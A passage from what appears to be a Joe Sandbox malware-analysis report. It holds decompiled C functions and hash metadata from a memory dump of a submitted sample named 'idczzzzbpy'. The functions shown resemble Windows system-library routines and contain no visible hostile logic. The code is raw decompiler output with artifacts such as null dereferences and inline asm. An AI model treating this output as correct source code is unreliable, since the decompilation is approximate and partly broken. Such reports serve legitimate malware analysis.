                    				goto L4;
                    			}


























                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e38b8ad6ee57df2a67a343e9c38ca649437c36f8eacde48f204b74540b38bd7
                    • Instruction ID: 8fc5c8a05af90b64da0e8ba0583fe7b347b251faa5a51afd037ec911c7577bf2
                    • Opcode Fuzzy Hash: 5e38b8ad6ee57df2a67a343e9c38ca649437c36f8eacde48f204b74540b38bd7
                    • Instruction Fuzzy Hash: 9E51DA71105382ABD721EF68CC41B27BBE9FF54B14F10491EF89683651EBB0E844CBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01692AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                    				signed short* _v8;
                    				signed short* _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr* _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				short _t56;
                    				signed int _t57;
                    				intOrPtr _t58;
                    				signed short* _t61;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				intOrPtr _t84;
                    				intOrPtr _t87;
                    				intOrPtr* _t90;
                    				signed short* _t91;
                    				signed int _t95;
                    				signed short* _t96;
                    				intOrPtr _t97;
                    				intOrPtr _t102;
                    				signed int _t108;
                    				intOrPtr _t110;
                    				signed int _t111;
                    				signed short* _t112;
                    				void* _t113;
                    				signed int _t116;
                    				signed short** _t119;
                    				short* _t120;
                    				signed int _t123;
                    				signed int _t124;
                    				void* _t125;
                    				intOrPtr _t127;
                    				signed int _t128;
                    
                    				_t90 = __ecx;
                    				_v16 = __edx;
                    				_t108 = _a4;
                    				_v28 = __ecx;
                    				_t4 = _t108 - 1; // -1
                    				if(_t4 > 0x13) {
                    					L15:
                    					_t56 = 0xc0000100;
                    					L16:
                    					return _t56;
                    				}
                    				_t57 = _t108 * 0x1c;
                    				_v32 = _t57;
                    				_t6 = _t57 + 0x1758204; // 0x0
                    				_t123 =  *_t6;
                    				_t7 = _t57 + 0x1758208; // 0x1758207
                    				_t8 = _t57 + 0x1758208; // 0x1758207
                    				_t119 = _t8;
                    				_v36 = _t123;
                    				_t110 = _t7 + _t123 * 8;
                    				_v24 = _t110;
                    				_t111 = _a4;
                    				if(_t119 >= _t110) {
                    					L12:
                    					if(_t123 != 3) {
                    						_t58 =  *0x1758450; // 0x0
                    						if(_t58 == 0) {
                    							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                    						}
                    					} else {
                    						_t26 = _t57 + 0x175821c; // 0x0
                    						_t58 =  *_t26;
                    					}
                    					 *_t90 = _t58;
                    					goto L15;
                    				} else {
                    					goto L2;
                    				}
                    				while(1) {
                    					_t116 =  *_t61 & 0x0000ffff;
                    					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                    					if(_t116 == _t128) {
                    						goto L18;
                    					}
                    					L5:
                    					if(_t116 >= 0x61) {
                    						if(_t116 > 0x7a) {
                    							_t97 =  *0x1756d5c; // 0x7f3d0654
                    							_t72 =  *0x1756d5c; // 0x7f3d0654
                    							_t75 =  *0x1756d5c; // 0x7f3d0654
                    							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                    						} else {
                    							_t116 = _t116 - 0x20;
                    						}
                    					}
                    					if(_t128 >= 0x61) {
                    						if(_t128 > 0x7a) {
                    							_t102 =  *0x1756d5c; // 0x7f3d0654
                    							_t84 =  *0x1756d5c; // 0x7f3d0654
                    							_t87 =  *0x1756d5c; // 0x7f3d0654
                    							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                    						} else {
                    							_t128 = _t128 - 0x20;
                    						}
                    					}
                    					if(_t116 == _t128) {
                    						_t61 = _v12;
                    						_t96 = _v8;
                    					} else {
                    						_t113 = _t116 - _t128;
                    						L9:
                    						_t111 = _a4;
                    						if(_t113 == 0) {
                    							_t115 =  &(( *_t119)[_t111 + 1]);
                    							_t33 =  &(_t119[1]); // 0x100
                    							_t120 = _a8;
                    							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                    							_t35 = _t95 - 1; // 0xff
                    							_t124 = _t35;
                    							if(_t120 == 0) {
                    								L27:
                    								 *_a16 = _t95;
                    								_t56 = 0xc0000023;
                    								goto L16;
                    							}
                    							if(_t124 >= _a12) {
                    								if(_a12 >= 1) {
                    									 *_t120 = 0;
                    								}
                    								goto L27;
                    							}
                    							 *_a16 = _t124;
                    							_t125 = _t124 + _t124;
                    							E016AF3E0(_t120, _t115, _t125);
                    							_t56 = 0;
                    							 *((short*)(_t125 + _t120)) = 0;
                    							goto L16;
                    						}
                    						_t119 =  &(_t119[2]);
                    						if(_t119 < _v24) {
                    							L2:
                    							_t91 =  *_t119;
                    							_t61 = _t91;
                    							_v12 = _t61;
                    							_t112 =  &(_t61[_t111]);
                    							_v8 = _t112;
                    							if(_t61 >= _t112) {
                    								break;
                    							} else {
                    								_t127 = _v16 - _t91;
                    								_t96 = _t112;
                    								_v20 = _t127;
                    								_t116 =  *_t61 & 0x0000ffff;
                    								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                    								if(_t116 == _t128) {
                    									goto L18;
                    								}
                    								goto L5;
                    							}
                    						} else {
                    							_t90 = _v28;
                    							_t57 = _v32;
                    							_t123 = _v36;
                    							goto L12;
                    						}
                    					}
                    					L18:
                    					_t61 =  &(_t61[1]);
                    					_v12 = _t61;
                    					if(_t61 >= _t96) {
                    						break;
                    					}
                    					_t127 = _v20;
                    				}
                    				_t113 = 0;
                    				goto L9;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dec8eb1ee25dbf135db19fa90e1238a1a0c4be37799edac9e0f8994a87f34de0
                    • Instruction ID: bfbe5af431c261cfc93a28adb055272d63f7be51a9d8c4bb9edc1ba5879c40de
                    • Opcode Fuzzy Hash: dec8eb1ee25dbf135db19fa90e1238a1a0c4be37799edac9e0f8994a87f34de0
                    • Instruction Fuzzy Hash: A751D076A00115DFCF18CF1CC8A09BDB7F5FB98704705845EE8469B318D734AA91CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0172AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                    				signed int _v8;
                    				signed int _v12;
                    				void* __esi;
                    				void* __ebp;
                    				signed short* _t36;
                    				signed int _t41;
                    				char* _t42;
                    				intOrPtr _t43;
                    				signed int _t47;
                    				void* _t52;
                    				signed int _t57;
                    				intOrPtr _t61;
                    				signed char _t62;
                    				signed int _t72;
                    				signed char _t85;
                    				signed int _t88;
                    
                    				_t73 = __edx;
                    				_push(__ecx);
                    				_t85 = __ecx;
                    				_v8 = __edx;
                    				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                    				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                    				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                    					_t57 = _t57 | 0x00000001;
                    				}
                    				_t88 = 0;
                    				_t36 = 0;
                    				_t96 = _a12;
                    				if(_a12 == 0) {
                    					_t62 = _a8;
                    					__eflags = _t62;
                    					if(__eflags == 0) {
                    						goto L12;
                    					}
                    					_t52 = E0172C38B(_t85, _t73, _t57, 0);
                    					_t62 = _a8;
                    					 *_t62 = _t52;
                    					_t36 = 0;
                    					goto L11;
                    				} else {
                    					_t36 = E0172ACFD(_t85, _t73, _t96, _t57, _a8);
                    					if(0 == 0 || 0 == 0xffffffff) {
                    						_t72 = _t88;
                    					} else {
                    						_t72 =  *0x00000000 & 0x0000ffff;
                    					}
                    					 *_a12 = _t72;
                    					_t62 = _a8;
                    					L11:
                    					_t73 = _v8;
                    					L12:
                    					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                    						L19:
                    						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                    							L22:
                    							_t74 = _v8;
                    							__eflags = _v8;
                    							if(__eflags != 0) {
                    								L25:
                    								__eflags = _t88 - 2;
                    								if(_t88 != 2) {
                    									__eflags = _t85 + 0x44 + (_t88 << 6);
                    									_t88 = E0172FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                    									goto L34;
                    								}
                    								L26:
                    								_t59 = _v8;
                    								E0172EA55(_t85, _v8, _t57);
                    								asm("sbb esi, esi");
                    								_t88 =  ~_t88;
                    								_t41 = E01687D50();
                    								__eflags = _t41;
                    								if(_t41 == 0) {
                    									_t42 = 0x7ffe0380;
                    								} else {
                    									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    								}
                    								__eflags =  *_t42;
                    								if( *_t42 != 0) {
                    									_t43 =  *[fs:0x30];
                    									__eflags =  *(_t43 + 0x240) & 0x00000001;
                    									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                    										__eflags = _t88;
                    										if(_t88 != 0) {
                    											E01721608(_t85, _t59, 3);
                    										}
                    									}
                    								}
                    								goto L34;
                    							}
                    							_push(_t62);
                    							_t47 = E01731536(0x1758ae4, (_t74 -  *0x1758b04 >> 0x14) + (_t74 -  *0x1758b04 >> 0x14), _t88, __eflags);
                    							__eflags = _t47;
                    							if(_t47 == 0) {
                    								goto L26;
                    							}
                    							_t74 = _v12;
                    							_t27 = _t47 - 1; // -1
                    							_t88 = _t27;
                    							goto L25;
                    						}
                    						_t62 = _t85;
                    						if(L0172C323(_t62, _v8, _t57) != 0xffffffff) {
                    							goto L22;
                    						}
                    						_push(_t62);
                    						_push(_t88);
                    						E0172A80D(_t85, 9, _v8, _t88);
                    						goto L34;
                    					} else {
                    						_t101 = _t36;
                    						if(_t36 != 0) {
                    							L16:
                    							if(_t36 == 0xffffffff) {
                    								goto L19;
                    							}
                    							_t62 =  *((intOrPtr*)(_t36 + 2));
                    							if((_t62 & 0x0000000f) == 0) {
                    								goto L19;
                    							}
                    							_t62 = _t62 & 0xf;
                    							if(E0170CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                    								L34:
                    								return _t88;
                    							}
                    							goto L19;
                    						}
                    						_t62 = _t85;
                    						_t36 = E0172ACFD(_t62, _t73, _t101, _t57, _t62);
                    						if(_t36 == 0) {
                    							goto L19;
                    						}
                    						goto L16;
                    					}
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8260f75cac3ecaad4f9b9d2d98339f5226bba44c1d5e5ec845629a7619353906
                    • Instruction ID: 1db59236e737c5f4f710ca90bac47b78eb7fc5de78e5bb4cb41be3e66d340df4
                    • Opcode Fuzzy Hash: 8260f75cac3ecaad4f9b9d2d98339f5226bba44c1d5e5ec845629a7619353906
                    • Instruction Fuzzy Hash: BE410671B007329BD726CA29C894F3BF79AEF94620F044659F91687AD4DB38D903C691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0168DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v5;
                    				signed int _v12;
                    				signed int* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				void* __ebx;
                    				void* __edi;
                    				signed int _t54;
                    				char* _t58;
                    				signed int _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				intOrPtr _t72;
                    				intOrPtr _t73;
                    				signed int* _t75;
                    				intOrPtr _t79;
                    				intOrPtr _t80;
                    				char _t82;
                    				signed int _t83;
                    				signed int _t84;
                    				signed int _t88;
                    				signed int _t89;
                    				intOrPtr _t90;
                    				intOrPtr _t92;
                    				signed int _t97;
                    				intOrPtr _t98;
                    				intOrPtr* _t99;
                    				signed int* _t101;
                    				signed int* _t102;
                    				intOrPtr* _t103;
                    				intOrPtr _t105;
                    				signed int _t106;
                    				void* _t118;
                    
                    				_t92 = __edx;
                    				_t75 = _a4;
                    				_t98 = __ecx;
                    				_v44 = __edx;
                    				_t106 = _t75[1];
                    				_v40 = __ecx;
                    				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                    					_t82 = 0;
                    				} else {
                    					_t82 = 1;
                    				}
                    				_v5 = _t82;
                    				_t6 = _t98 + 0xc8; // 0xc9
                    				_t101 = _t6;
                    				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                    				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                    				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                    				if(_t82 != 0) {
                    					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                    					_t83 =  *_t75;
                    					_t54 = _t75[1];
                    					 *_t101 = _t83;
                    					_t84 = _t83 | _t54;
                    					_t101[1] = _t54;
                    					if(_t84 == 0) {
                    						_t101[1] = _t101[1] & _t84;
                    						 *_t101 = 1;
                    					}
                    					goto L19;
                    				} else {
                    					if(_t101 == 0) {
                    						E0166CC50(E01664510(0xc000000d));
                    						_t88 =  *_t101;
                    						_t97 = _t101[1];
                    						L15:
                    						_v12 = _t88;
                    						_t66 = _t88 -  *_t75;
                    						_t89 = _t97;
                    						asm("sbb ecx, [ebx+0x4]");
                    						_t118 = _t89 - _t97;
                    						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                    							_t66 = _t66 | 0xffffffff;
                    							_t89 = 0x7fffffff;
                    						}
                    						 *_t101 = _t66;
                    						_t101[1] = _t89;
                    						L19:
                    						if(E01687D50() != 0) {
                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    						} else {
                    							_t58 = 0x7ffe0386;
                    						}
                    						_t102 = _v16;
                    						if( *_t58 != 0) {
                    							_t58 = E01738ED6(_t102, _t98);
                    						}
                    						_t76 = _v44;
                    						E01682280(_t58, _v44);
                    						E0168DD82(_v44, _t102, _t98);
                    						E0168B944(_t102, _v5);
                    						return E0167FFB0(_t76, _t98, _t76);
                    					}
                    					_t99 = 0x7ffe03b0;
                    					do {
                    						_t103 = 0x7ffe0010;
                    						do {
                    							_t67 =  *0x1758628; // 0x0
                    							_v28 = _t67;
                    							_t68 =  *0x175862c; // 0x0
                    							_v32 = _t68;
                    							_v24 =  *((intOrPtr*)(_t99 + 4));
                    							_v20 =  *_t99;
                    							while(1) {
                    								_t97 =  *0x7ffe000c;
                    								_t90 =  *0x7FFE0008;
                    								if(_t97 ==  *_t103) {
                    									goto L10;
                    								}
                    								asm("pause");
                    							}
                    							L10:
                    							_t79 = _v24;
                    							_t99 = 0x7ffe03b0;
                    							_v12 =  *0x7ffe03b0;
                    							_t72 =  *0x7FFE03B4;
                    							_t103 = 0x7ffe0010;
                    							_v36 = _t72;
                    						} while (_v20 != _v12 || _t79 != _t72);
                    						_t73 =  *0x1758628; // 0x0
                    						_t105 = _v28;
                    						_t80 =  *0x175862c; // 0x0
                    					} while (_t105 != _t73 || _v32 != _t80);
                    					_t98 = _v40;
                    					asm("sbb edx, [ebp-0x20]");
                    					_t88 = _t90 - _v12 - _t105;
                    					_t75 = _a4;
                    					asm("sbb edx, eax");
                    					_t31 = _t98 + 0xc8; // 0x172fb53
                    					_t101 = _t31;
                    					 *_t101 = _t88;
                    					_t101[1] = _t97;
                    					goto L15;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c3297b7d9f28ffd7cfc625ee39b3aabeb6f90fda10a5260da19cbe2df2d98ecb
                    • Instruction ID: 1c2adb4ef2a8673c0948dc2a563e9f6ffef843a76c3db63d980d898ae9e2bf0b
                    • Opcode Fuzzy Hash: c3297b7d9f28ffd7cfc625ee39b3aabeb6f90fda10a5260da19cbe2df2d98ecb
                    • Instruction Fuzzy Hash: 8C51B272E00206CFCB14DFA8C890A9EFBF5FB48350F248259D955A7385DB71A944CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0167EF40(intOrPtr __ecx) {
                    				char _v5;
                    				char _v6;
                    				char _v7;
                    				char _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t58;
                    				char _t59;
                    				signed char _t69;
                    				void* _t73;
                    				signed int _t74;
                    				char _t79;
                    				signed char _t81;
                    				signed int _t85;
                    				signed int _t87;
                    				intOrPtr _t90;
                    				signed char* _t91;
                    				void* _t92;
                    				signed int _t94;
                    				void* _t96;
                    
                    				_t90 = __ecx;
                    				_v16 = __ecx;
                    				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                    					_t58 =  *((intOrPtr*)(__ecx));
                    					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                    						E01669080(_t73, __ecx, __ecx, _t92);
                    					}
                    				}
                    				_t74 = 0;
                    				_t96 =  *0x7ffe036a - 1;
                    				_v12 = 0;
                    				_v7 = 0;
                    				if(_t96 > 0) {
                    					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                    					_v12 = _t74;
                    					_v7 = _t96 != 0;
                    				}
                    				_t79 = 0;
                    				_v8 = 0;
                    				_v5 = 0;
                    				while(1) {
                    					L4:
                    					_t59 = 1;
                    					L5:
                    					while(1) {
                    						if(_t59 == 0) {
                    							L12:
                    							_t21 = _t90 + 4; // 0x7746c21e
                    							_t87 =  *_t21;
                    							_v6 = 0;
                    							if(_t79 != 0) {
                    								if((_t87 & 0x00000002) != 0) {
                    									goto L19;
                    								}
                    								if((_t87 & 0x00000001) != 0) {
                    									_v6 = 1;
                    									_t74 = _t87 ^ 0x00000003;
                    								} else {
                    									_t51 = _t87 - 2; // -2
                    									_t74 = _t51;
                    								}
                    								goto L15;
                    							} else {
                    								if((_t87 & 0x00000001) != 0) {
                    									_v6 = 1;
                    									_t74 = _t87 ^ 0x00000001;
                    								} else {
                    									_t26 = _t87 - 4; // -4
                    									_t74 = _t26;
                    									if((_t74 & 0x00000002) == 0) {
                    										_t74 = _t74 - 2;
                    									}
                    								}
                    								L15:
                    								if(_t74 == _t87) {
                    									L19:
                    									E01662D8A(_t74, _t90, _t87, _t90);
                    									_t74 = _v12;
                    									_v8 = 1;
                    									if(_v7 != 0 && _t74 > 0x64) {
                    										_t74 = _t74 - 1;
                    										_v12 = _t74;
                    									}
                    									_t79 = _v5;
                    									goto L4;
                    								}
                    								asm("lock cmpxchg [esi], ecx");
                    								if(_t87 != _t87) {
                    									_t74 = _v12;
                    									_t59 = 0;
                    									_t79 = _v5;
                    									continue;
                    								}
                    								if(_v6 != 0) {
                    									_t74 = _v12;
                    									L25:
                    									if(_v7 != 0) {
                    										if(_t74 < 0x7d0) {
                    											if(_v8 == 0) {
                    												_t74 = _t74 + 1;
                    											}
                    										}
                    										_t38 = _t90 + 0x14; // 0x0
                    										_t39 = _t90 + 0x14; // 0x0
                    										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                    										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                    											_t85 = _t85 & 0xff000000;
                    										}
                    										 *(_t90 + 0x14) = _t85;
                    									}
                    									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                    									 *((intOrPtr*)(_t90 + 8)) = 1;
                    									return 0;
                    								}
                    								_v5 = 1;
                    								_t87 = _t74;
                    								goto L19;
                    							}
                    						}
                    						_t94 = _t74;
                    						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                    						if(_t74 == 0) {
                    							goto L12;
                    						} else {
                    							_t91 = _t90 + 4;
                    							goto L8;
                    							L9:
                    							while((_t81 & 0x00000001) != 0) {
                    								_t69 = _t81;
                    								asm("lock cmpxchg [edi], edx");
                    								if(_t69 != _t81) {
                    									_t81 = _t69;
                    									continue;
                    								}
                    								_t90 = _v16;
                    								goto L25;
                    							}
                    							asm("pause");
                    							_t94 = _t94 - 1;
                    							if(_t94 != 0) {
                    								L8:
                    								_t81 =  *_t91;
                    								goto L9;
                    							} else {
                    								_t90 = _v16;
                    								_t79 = _v5;
                    								goto L12;
                    							}
                    						}
                    					}
                    				}
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction ID: 130d658315be215c53f89b24965b24a17a9a4c60a91ddaf1b573ec44d8898e6f
                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction Fuzzy Hash: DA510430E04245DFEB26CB6CC9E0BAEBBB1AF05314F1881E8C56553382C77AA989C751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0173740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                    				signed short* _v8;
                    				intOrPtr _v12;
                    				intOrPtr _t55;
                    				void* _t56;
                    				intOrPtr* _t66;
                    				intOrPtr* _t69;
                    				void* _t74;
                    				intOrPtr* _t78;
                    				intOrPtr* _t81;
                    				intOrPtr* _t82;
                    				intOrPtr _t83;
                    				signed short* _t84;
                    				intOrPtr _t85;
                    				signed int _t87;
                    				intOrPtr* _t90;
                    				intOrPtr* _t93;
                    				intOrPtr* _t94;
                    				void* _t98;
                    
                    				_t84 = __edx;
                    				_t80 = __ecx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t55 = __ecx;
                    				_v8 = __edx;
                    				_t87 =  *__edx & 0x0000ffff;
                    				_v12 = __ecx;
                    				_t3 = _t55 + 0x154; // 0x154
                    				_t93 = _t3;
                    				_t78 =  *_t93;
                    				_t4 = _t87 + 2; // 0x2
                    				_t56 = _t4;
                    				while(_t78 != _t93) {
                    					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                    						L4:
                    						_t78 =  *_t78;
                    						continue;
                    					} else {
                    						_t7 = _t78 + 0x18; // 0x18
                    						if(E016BD4F0(_t7, _t84[2], _t87) == _t87) {
                    							_t40 = _t78 + 0xc; // 0xc
                    							_t94 = _t40;
                    							_t90 =  *_t94;
                    							while(_t90 != _t94) {
                    								_t41 = _t90 + 8; // 0x8
                    								_t74 = E016AF380(_a4, _t41, 0x10);
                    								_t98 = _t98 + 0xc;
                    								if(_t74 != 0) {
                    									_t90 =  *_t90;
                    									continue;
                    								}
                    								goto L12;
                    							}
                    							_t82 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                    							if(_t82 != 0) {
                    								_t46 = _t78 + 0xc; // 0xc
                    								_t69 = _t46;
                    								asm("movsd");
                    								asm("movsd");
                    								asm("movsd");
                    								asm("movsd");
                    								_t85 =  *_t69;
                    								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                    									L20:
                    									_t82 = 3;
                    									asm("int 0x29");
                    								}
                    								 *((intOrPtr*)(_t82 + 4)) = _t69;
                    								 *_t82 = _t85;
                    								 *((intOrPtr*)(_t85 + 4)) = _t82;
                    								 *_t69 = _t82;
                    								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                    								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                    								goto L11;
                    							} else {
                    								L18:
                    								_push(0xe);
                    								_pop(0);
                    							}
                    						} else {
                    							_t84 = _v8;
                    							_t9 = _t87 + 2; // 0x2
                    							_t56 = _t9;
                    							goto L4;
                    						}
                    					}
                    					L12:
                    					return 0;
                    				}
                    				_t10 = _t87 + 0x1a; // 0x1a
                    				_t78 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                    				if(_t78 == 0) {
                    					goto L18;
                    				} else {
                    					_t12 = _t87 + 2; // 0x2
                    					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                    					_t16 = _t78 + 0x18; // 0x18
                    					E016AF3E0(_t16, _v8[2], _t87);
                    					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                    					_t19 = _t78 + 0xc; // 0xc
                    					_t66 = _t19;
                    					 *((intOrPtr*)(_t66 + 4)) = _t66;
                    					 *_t66 = _t66;
                    					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                    					_t81 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                    					if(_t81 == 0) {
                    						goto L18;
                    					} else {
                    						_t26 = _t78 + 0xc; // 0xc
                    						_t69 = _t26;
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						_t85 =  *_t69;
                    						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                    							goto L20;
                    						} else {
                    							 *((intOrPtr*)(_t81 + 4)) = _t69;
                    							 *_t81 = _t85;
                    							 *((intOrPtr*)(_t85 + 4)) = _t81;
                    							 *_t69 = _t81;
                    							_t83 = _v12;
                    							 *(_t78 + 8) = 1;
                    							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                    							_t34 = _t83 + 0x154; // 0x1ba
                    							_t69 = _t34;
                    							_t85 =  *_t69;
                    							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                    								goto L20;
                    							} else {
                    								 *_t78 = _t85;
                    								 *((intOrPtr*)(_t78 + 4)) = _t69;
                    								 *((intOrPtr*)(_t85 + 4)) = _t78;
                    								 *_t69 = _t78;
                    								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                    							}
                    						}
                    						goto L11;
                    					}
                    				}
                    				goto L12;
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction ID: d9c0ba8b597314426c5b9b49e332b4ba201e3986350e7fd049c7b4252fb333d1
                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction Fuzzy Hash: C5518FB1600646DFDB1ACF18C880A55FBF5FF85304F14C1AAE9089F252E771E945CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E01692990() {
                    				signed int* _t62;
                    				signed int _t64;
                    				intOrPtr _t66;
                    				signed short* _t69;
                    				intOrPtr _t76;
                    				signed short* _t79;
                    				void* _t81;
                    				signed int _t82;
                    				signed short* _t83;
                    				signed int _t87;
                    				intOrPtr _t91;
                    				void* _t98;
                    				signed int _t99;
                    				void* _t101;
                    				signed int* _t102;
                    				void* _t103;
                    				void* _t104;
                    				void* _t107;
                    
                    				_push(0x20);
                    				_push(0x173ff00);
                    				E016BD08C(_t81, _t98, _t101);
                    				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                    				_t99 = 0;
                    				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                    				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                    				if(_t82 == 0) {
                    					_t62 = 0xc0000100;
                    				} else {
                    					 *((intOrPtr*)(_t103 - 4)) = 0;
                    					_t102 = 0xc0000100;
                    					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                    					_t64 = 4;
                    					while(1) {
                    						 *(_t103 - 0x24) = _t64;
                    						if(_t64 == 0) {
                    							break;
                    						}
                    						_t87 = _t64 * 0xc;
                    						 *(_t103 - 0x2c) = _t87;
                    						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1641664));
                    						if(_t107 <= 0) {
                    							if(_t107 == 0) {
